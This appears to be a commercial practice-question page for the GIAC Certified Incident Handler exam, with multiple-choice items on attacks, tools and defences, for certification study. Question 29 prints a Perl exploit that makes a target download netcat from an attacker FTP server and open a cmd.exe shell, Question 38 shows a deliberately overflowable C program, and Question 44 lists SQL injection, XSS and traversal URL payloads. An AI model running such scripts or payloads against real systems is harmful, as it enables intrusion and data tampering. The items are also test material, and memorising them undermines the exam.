Labour Day Special Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: geek65

GCIH GIAC Certified Incident Handler Questions and Answers

Questions 4

John works as a Network Administrator for Net Perfect Inc. The company has a Windows-based network. The company uses Check Point SmartDefense to provide security to the network of the company. On the HTTP servers of the company, John defines a rule for dropping any kind of userdefined URLs. Which of the following types of attacks can be prevented by dropping the user-defined URLs?

Options:

A.

Morris worm

B.

Code red worm

C.

Hybrid attacks

D.

PTC worms and mutations

Buy Now
Questions 5

In the DNS Zone transfer enumeration, an attacker attempts to retrieve a copy of the entire zone file for a domain from a DNS server. The information provided by the DNS zone can help an attacker gather user names, passwords, and other valuable information. To attempt a zone transfer, an attacker must be connected to a DNS server that is the authoritative server for that zone. Besides this, an attacker can launch a Denial of Service attack against the zone's DNS servers by flooding them with a lot of requests. Which of the following tools can an attacker use to perform a DNS zone transfer?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Host

B.

Dig

C.

DSniff

D.

NSLookup

Buy Now
Questions 6

Which of the following statements is true about the difference between worms and Trojan horses?

Options:

A.

Trojan horses are a form of malicious codes while worms are not.

B.

Trojan horses are harmful to computers while worms are not.

C.

Worms can be distributed through emails while Trojan horses cannot.

D.

Worms replicate themselves while Trojan horses do not.

Buy Now
Questions 7

Rick works as a Computer Forensic Investigator for BlueWells Inc. He has been informed that some confidential information is being leaked out by an employee of the company. Rick suspects that someone is sending the information through email. He checks the emails sent by some employees to other networks. Rick finds out that Sam, an employee of the Sales department, is continuously sending text files that contain special symbols, graphics, and signs. Rick suspects that Sam is using the Steganography technique to send data in a disguised form. Which of the following techniques is Sam using?

Each correct answer represents a part of the solution. Choose all that apply.

Options:

A.

Linguistic steganography

B.

Perceptual masking

C.

Technical steganography

D.

Text Semagrams

Buy Now
Questions 8

John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He has successfully completed the following steps of the pre-attack phase:

l Information gathering

l Determining network range

l Identifying active machines

l Finding open ports and applications

l OS fingerprinting

l Fingerprinting services

Now John wants to perform network mapping of the We-are-secure network. Which of the following tools can he use to accomplish his task?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Ettercap

B.

Traceroute

C.

Cheops

D.

NeoTrace

Buy Now
Questions 9

Adam works as a Penetration Tester for Umbrella Inc. A project has been assigned to him check the security of wireless network of the company. He re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Adam assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs.

Which of the following types of attack is Adam performing?

Options:

A.

Replay attack

B.

MAC Spoofing attack

C.

Caffe Latte attack

D.

Network injection attack

Buy Now
Questions 10

Which of the following is the process of comparing cryptographic hash functions of system executables and configuration files?

Options:

A.

Shoulder surfing

B.

File integrity auditing

C.

Reconnaissance

D.

Spoofing

Buy Now
Questions 11

Which of the following US Acts emphasized a "risk-based policy for cost-effective security" and makes mandatory for agency program officials, chief information officers, and inspectors general (IGs) to conduct annual reviews of the agency's information security program and report the results to Office of Management and Budget?

Options:

A.

The Electronic Communications Privacy Act of 1986 (ECPA)

B.

The Fair Credit Reporting Act (FCRA)

C.

The Equal Credit Opportunity Act (ECOA)

D.

Federal Information Security Management Act of 2002 (FISMA)

Buy Now
Questions 12

You enter the netstat -an command in the command prompt and you receive intimation that port number 7777 is open on your computer. Which of the following Trojans may be installed on your computer?

Options:

A.

NetBus

B.

QAZ

C.

Donald Dick

D.

Tini

Buy Now
Questions 13

A user is sending a large number of protocol packets to a network in order to saturate its resources and to disrupt connections to prevent communications between services. Which type of attack is this?

Options:

A.

Vulnerability attack

B.

Impersonation attack

C.

Social Engineering attack

D.

Denial-of-Service attack

Buy Now
Questions 14

You work as an Incident handling manager for a company. The public relations process of the company includes an event that responds to the e-mails queries. But since few days, it is identified that this process is providing a way to spammers to perform different types of e-mail attacks. Which of the following phases of the Incident handling process will now be involved in resolving this process and find a solution?

Each correct answer represents a part of the solution. Choose all that apply.

Options:

A.

Eradication

B.

Contamination

C.

Preparation

D.

Recovery

E.

Identification

Buy Now
Questions 15

Address Resolution Protocol (ARP) spoofing, also known as ARP poisoning or ARP Poison Routing (APR), is a technique used to attack an Ethernet wired or wireless network. ARP spoofing may allow an attacker to sniff data frames on a local area network (LAN), modify the traffic, or stop the traffic altogether. The principle of ARP spoofing is to send fake ARP messages to an Ethernet LAN. What steps can be used as a countermeasure of ARP spoofing?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Using smash guard utility

B.

Using ARP Guard utility

C.

Using static ARP entries on servers, workstation and routers

D.

Using ARP watch utility

E.

Using IDS Sensors to check continually for large amount of ARP traffic on local subnets

Buy Now
Questions 16

Which of the following netcat parameters makes netcat a listener that automatically restarts itself when a connection is dropped?

Options:

A.

-u

B.

-l

C.

-p

D.

-L

Buy Now
Questions 17

Which of the following statements about reconnaissance is true?

Options:

A.

It describes an attempt to transfer DNS zone data.

B.

It is a computer that is used to attract potential intruders or attackers.

C.

It is any program that allows a hacker to connect to a computer without going through the normal authentication process.

D.

It is also known as half-open scanning.

Buy Now
Questions 18

You are responsible for security at a company that uses a lot of Web applications. You are most concerned about flaws in those applications allowing some attacker to get into your network. What method would be best for finding such flaws?

Options:

A.

Manual penetration testing

B.

Code review

C.

Automated penetration testing

D.

Vulnerability scanning

Buy Now
Questions 19

Which of the following types of attacks is the result of vulnerabilities in a program due to poor programming techniques?

Options:

A.

Evasion attack

B.

Denial-of-Service (DoS) attack

C.

Ping of death attack

D.

Buffer overflow attack

Buy Now
Questions 20

Which of the following tools is an automated tool that is used to implement SQL injections and to retrieve data from Web server databases?

Options:

A.

Fragroute

B.

Absinthe

C.

Stick

D.

ADMutate

Buy Now
Questions 21

Adam works as a Security Analyst for Umbrella Inc. Company has a Windows-based network. All computers run on Windows XP. Manager of the Sales department complains Adam about the unusual behavior of his computer. He told Adam that some pornographic contents are suddenly appeared on his computer overnight. Adam suspects that some malicious software or Trojans have been installed on the computer. He runs some diagnostics programs and Port scanners and found that the Port 12345, 12346, and 20034 are open. Adam also noticed some tampering with the Windows registry, which causes one application to run every time when Windows start.

Which of the following is the most likely reason behind this issue?

Options:

A.

Cheops-ng is installed on the computer.

B.

Elsave is installed on the computer.

C.

NetBus is installed on the computer.

D.

NetStumbler is installed on the computer.

Buy Now
Questions 22

Which of the following functions can be used as a countermeasure to a Shell Injection attack?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

escapeshellarg()

B.

mysql_real_escape_string()

C.

regenerateid()

D.

escapeshellcmd()

Buy Now
Questions 23

Which of the following is spy software that records activity on Macintosh systems via snapshots, keystrokes, and Web site logging?

Options:

A.

Spector

B.

Magic Lantern

C.

eblaster

D.

NetBus

Buy Now
Questions 24

Which of the following takes control of a session between a server and a client using TELNET, FTP, or any other non-encrypted TCP/IP utility?

Options:

A.

Dictionary attack

B.

Session Hijacking

C.

Trojan horse

D.

Social Engineering

Buy Now
Questions 25

Which of the following attacks is specially used for cracking a password?

Options:

A.

PING attack

B.

Dictionary attack

C.

Vulnerability attack

D.

DoS attack

Buy Now
Questions 26

Which of the following is a reason to implement security logging on a DNS server?

Options:

A.

For preventing malware attacks on a DNS server

B.

For measuring a DNS server's performance

C.

For monitoring unauthorized zone transfer

D.

For recording the number of queries resolved

Buy Now
Questions 27

Which of the following refers to the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system?

Options:

A.

Piggybacking

B.

Hacking

C.

Session hijacking

D.

Keystroke logging

Buy Now
Questions 28

Your network is being flooded by ICMP packets. When you trace them down they come from multiple different IP addresses. What kind of attack is this?

Options:

A.

Syn flood

B.

Ping storm

C.

Smurf attack

D.

DDOS

Buy Now
Questions 29

Adam, a malicious hacker performs an exploit, which is given below:

#####################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#####################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host –C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Options:

A.

Creates a share called "sasfile" on the target system

B.

Creates an FTP server with write permissions enabled

C.

Opens up a SMTP server that requires no username or password

D.

Opens up a telnet listener that requires no username or password

Buy Now
Questions 30

Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except the ports that must be used. He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Adam is still worried about the programs like Hping2 that can get into a network through covert channels.

Which of the following is the most effective way to protect the network of the company from an attacker using Hping2 to scan his internal network?

Options:

A.

Block all outgoing traffic on port 21

B.

Block all outgoing traffic on port 53

C.

Block ICMP type 13 messages

D.

Block ICMP type 3 messages

Buy Now
Questions 31

Maria works as a professional Ethical Hacker. She is assigned a project to test the security of www.we-are-secure.com. She wants to test a DoS attack on the We-are-secure server. She finds that the firewall of the server is blocking the ICMP messages, but it is not checking the UDP packets. Therefore, she sends a large amount of UDP echo request traffic to the IP broadcast addresses. These UDP requests have a spoofed source address of the We-are-secure server. Which of the following DoS attacks is Maria using to accomplish her task?

Options:

A.

Ping flood attack

B.

Fraggle DoS attack

C.

Teardrop attack

D.

Smurf DoS attack

Buy Now
Questions 32

Which of the following is designed to protect the Internet resolvers (clients) from forged DNS data created by DNS cache poisoning?

Options:

A.

Stub resolver

B.

BINDER

C.

Split-horizon DNS

D.

Domain Name System Extension (DNSSEC)

Buy Now
Questions 33

Which of the following attacks come under the category of layer 2 Denial-of-Service attacks?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Spoofing attack

B.

SYN flood attack

C.

Password cracking

D.

RF jamming attack

Buy Now
Questions 34

Buffer overflows are one of the major errors used for exploitation on the Internet today. A buffer overflow occurs when a particular operation/function writes more data into a variable than the variable was designed to hold.

Which of the following are the two popular types of buffer overflows?

Each correct answer represents a complete solution. Choose two.

Options:

A.

Dynamic buffer overflows

B.

Stack based buffer overflow

C.

Heap based buffer overflow

D.

Static buffer overflows

Buy Now
Questions 35

Which of the following protocols uses only User Datagram Protocol (UDP)?

Options:

A.

POP3

B.

FTP

C.

ICMP

D.

TFTP

Buy Now
Questions 36

Which of the following statements about smurf is true?

Options:

A.

It is a UDP attack that involves spoofing and flooding.

B.

It is an ICMP attack that involves spoofing and flooding.

C.

It is an attack with IP fragments that cannot be reassembled.

D.

It is a denial of service (DoS) attack that leaves TCP ports open.

Buy Now
Questions 37

Which of the following applications is NOT used for passive OS fingerprinting?

Options:

A.

Networkminer

B.

Satori

C.

p0f

D.

Nmap

Buy Now
Questions 38

John works as a C programmer. He develops the following C program:

#include

#include

#include

int buffer(char *str) {

char buffer1[10];

strcpy(buffer1, str);

return 1;

}

int main(int argc, char *argv[]) {

buffer (argv[1]);

printf("Executed\n");

return 1;

}

His program is vulnerable to a __________ attack.

Options:

A.

SQL injection

B.

Denial-of-Service

C.

Buffer overflow

D.

Cross site scripting

Buy Now
Questions 39

Which of the following Linux rootkits allows an attacker to hide files, processes, and network connections?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Phalanx2

B.

Beastkit

C.

Adore

D.

Knark

Buy Now
Questions 40

Which of the following is the difference between SSL and S-HTTP?

Options:

A.

SSL operates at the application layer and S-HTTP operates at the network layer.

B.

SSL operates at the application layer and S-HTTP operates at the transport layer.

C.

SSL operates at the network layer and S-HTTP operates at the application layer.

D.

SSL operates at the transport layer and S-HTTP operates at the application layer.

Buy Now
Questions 41

Which of the following penetration testing phases involves gathering data from whois, DNS, and network scanning, which helps in mapping a target network and provides valuable information regarding the operating system and applications running on the systems?

Options:

A.

Post-attack phase

B.

On-attack phase

C.

Attack phase

D.

Pre-attack phase

Buy Now
Questions 42

Your IDS discovers that an intruder has gained access to your system. You immediately stop that access, change passwords for administrative accounts, and secure your network. You discover an odd account (not administrative) that has permission to remotely access the network. What is this most likely?

Options:

A.

An example of privilege escalation.

B.

A normal account you simply did not notice before. Large networks have a number of accounts; it is hard to track them all.

C.

A backdoor the intruder created so that he can re-enter the network.

D.

An example of IP spoofing.

Buy Now
Questions 43

Which of the following types of scan does not open a full TCP connection?

Options:

A.

FIN scan

B.

ACK scan

C.

Stealth scan

D.

Idle scan

Buy Now
Questions 44

Which of the following HTTP requests is the SQL injection attack?

Options:

A.

http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al

B.

http://www.victim.com/example?accountnumber=67891 &creditamount=999999999

C.

http://www.myserver.com/search.asp?lname=adam%27%3bupdate%20usertable%20set% 20pass wd%3d %27hCx0r%27%3b--%00

D.

http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%

2fwww.yourser ver.c0m %2fbadscript.js%22%3e%3c%2fscript%3e

Buy Now
Questions 45

Which of the following statements about buffer overflow are true?

Each correct answer represents a complete solution. Choose two.

Options:

A.

It is a situation that occurs when a storage device runs out of space.

B.

It is a situation that occurs when an application receives more data than it is configured to accept.

C.

It can improve application performance.

D.

It can terminate an application.

Buy Now
Questions 46

Which of the following steps can be taken as countermeasures against sniffer attacks?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Use encrypted protocols for all communications.

B.

Use switches instead of hubs since they switch communications, which means that information is delivered only to the predefined host.

C.

Use tools such as StackGuard and Immunix System to avoid attacks.

D.

Reduce the range of the network to avoid attacks into wireless networks.

Buy Now
Questions 47

Which of the following are the limitations for the cross site request forgery (CSRF) attack?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

The attacker must determine the right values for all the form inputs.

B.

The attacker must target a site that doesn't check the referrer header.

C.

The target site should have limited lifetime authentication cookies.

D.

The target site should authenticate in GET and POST parameters, not only cookies.

Buy Now
Questions 48

Which of the following IP packet elements is responsible for authentication while using IPSec?

Options:

A.

Authentication Header (AH)

B.

Layer 2 Tunneling Protocol (L2TP)

C.

Internet Key Exchange (IKE)

D.

Encapsulating Security Payload (ESP)

Buy Now
Questions 49

Which of the following refers to a condition in which a hacker sends a bunch of packets that leave TCP ports half open?

Options:

A.

Spoofing

B.

Hacking

C.

SYN attack

D.

PING attack

Buy Now
Exam Code: GCIH
Exam Name: GIAC Certified Incident Handler
Last Update: May 5, 2024
Questions: 328
GCIH pdf

GCIH PDF

$28  $80
GCIH Engine

GCIH Testing Engine

$33.25  $95
GCIH PDF + Engine

GCIH PDF + Testing Engine

$45.5  $130